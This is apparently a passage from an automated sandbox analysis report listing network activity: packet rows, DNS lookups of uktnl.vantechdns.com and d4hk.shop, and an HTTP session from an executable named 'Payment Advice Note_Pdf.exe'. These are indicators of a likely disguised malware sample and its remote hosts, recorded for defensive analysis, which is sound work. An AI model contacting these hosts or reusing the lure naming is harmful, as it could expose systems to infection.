Sep 30, 2024 15:10:15.176738024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176757097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176760912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176784039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176803112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176820993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176839113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176856995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176875114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176928997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176928997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177098989 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177124023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177145004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177270889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177270889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177270889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177366972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177387953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177406073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177424908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177445889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177464962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177483082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177500963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177517891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177535057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177611113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177611113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177611113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177726984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177747965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177767992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177778959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.177794933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177813053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177829981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177848101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.177948952 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.178118944 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.178118944 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.178235054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178255081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178458929 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.178525925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178545952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178563118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178580999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178599119 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178617001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178637028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178654909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178673029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178689957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178708076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178726912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.178798914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.178848028 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.179018021 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.179131031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179231882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179250956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179267883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179299116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179316998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179358006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.179405928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.179575920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.179625988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179646015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179665089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179682970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179701090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179719925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179739952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179770947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179821968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179840088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179858923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179876089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179893970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179912090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179917097 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.179917097 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.179940939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179959059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.179977894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180094957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180114031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180134058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180138111 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.180138111 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.180164099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180211067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180265903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180284977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180304050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180306911 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.180329084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180367947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180427074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180449009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180466890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180475950 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.180495977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180516005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180536032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180645943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.180669069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180686951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180704117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180721998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180815935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.180815935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.180815935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.180882931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180924892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.180986881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.181035995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181052923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181071043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181087971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181133986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181154013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181158066 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.181158066 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.181184053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181201935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181220055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181237936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181325912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.181325912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.181497097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181499958 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.181612968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181665897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181668997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.181693077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181742907 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181797981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181816101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181837082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181839943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.181862116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181924105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181943893 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181965113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.181984901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182002068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182007074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182029963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182079077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182096958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182167053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182177067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182177067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182177067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182224035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182346106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182467937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182514906 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182514906 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182528019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182578087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182682991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182687044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182687044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182713032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182730913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182841063 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182854891 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.182867050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182976007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.182996035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183026075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183029890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183029890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183029890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183058977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183077097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183136940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183187008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183196068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183196068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183217049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183234930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183254004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183271885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183367014 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183367014 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183536053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183536053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183600903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183660030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183679104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183697939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183722019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183739901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183758020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183775902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183794022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183811903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183830976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183876038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.183896065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.183924913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184093952 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184144974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184199095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184220076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184237003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184256077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184266090 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184293985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184340000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184434891 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184434891 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184457064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184475899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184482098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184501886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184520960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184539080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184556961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184597015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184653997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184653997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184703112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184757948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184776068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184792995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184809923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.184823036 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184994936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184994936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.184994936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.185376883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.185399055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.185416937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.185462952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.185482025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.185501099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.185518980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.185537100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.185565948 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.185565948 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.185734987 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.185904980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.187037945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.337167978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:16.783531904 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:16.933161020 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:16.933317900 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:16.933418989 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:16.933468103 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:16.933516026 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:16.933564901 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.083127975 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083149910 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083312988 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083374977 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083375931 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.083425999 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.083539009 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083553076 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083626032 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083647966 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.083815098 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.083868980 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083880901 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.083890915 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.084203959 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.233228922 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.233242035 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.233298063 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.233397961 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.233418941 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.233428955 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.233448982 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.233655930 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.233666897 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:17.233948946 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.234072924 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.234083891 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.234093904 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.234322071 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.235207081 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.235217094 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.235227108 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.383770943 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.383784056 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.383794069 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:17.383805037 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:20.387989044 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:20.388003111 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:20.388178110 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:20.388358116 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:20.388551950 CEST	80	49755	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:20.388781071 CEST	49755	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:20.537883043 CEST	80	49755	172.67.215.93	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 15:10:08.103766918 CEST	61761	53	192.168.11.20	1.1.1.1
Sep 30, 2024 15:10:09.116158009 CEST	61761	53	192.168.11.20	9.9.9.9
Sep 30, 2024 15:10:09.757841110 CEST	53	61761	9.9.9.9	192.168.11.20
Sep 30, 2024 15:10:09.875564098 CEST	53	61761	1.1.1.1	192.168.11.20
Sep 30, 2024 15:10:11.419646025 CEST	55742	53	192.168.11.20	9.9.9.9
Sep 30, 2024 15:10:11.576823950 CEST	53	55742	9.9.9.9	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 15:10:08.103766918 CEST	192.168.11.20	1.1.1.1	0x8a24	Standard query (0)	uktnl.vantechdns.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:10:09.116158009 CEST	192.168.11.20	9.9.9.9	0x8a24	Standard query (0)	uktnl.vantechdns.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:10:11.419646025 CEST	192.168.11.20	9.9.9.9	0x8a29	Standard query (0)	d4hk.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 15:10:09.757841110 CEST	9.9.9.9	192.168.11.20	0x8a24	No error (0)	uktnl.vantechdns.com	172.93.121.126	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:10:09.875564098 CEST	1.1.1.1	192.168.11.20	0x8a24	No error (0)	uktnl.vantechdns.com	172.93.121.126	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:10:11.576823950 CEST	9.9.9.9	192.168.11.20	0x8a29	No error (0)	d4hk.shop	172.67.215.93	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:10:11.576823950 CEST	9.9.9.9	192.168.11.20	0x8a29	No error (0)	d4hk.shop	104.21.78.29	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

uktnl.vantechdns.com

d4hk.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49754	172.67.215.93	80	7280	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Timestamp	Bytes transferred	Direction	Data
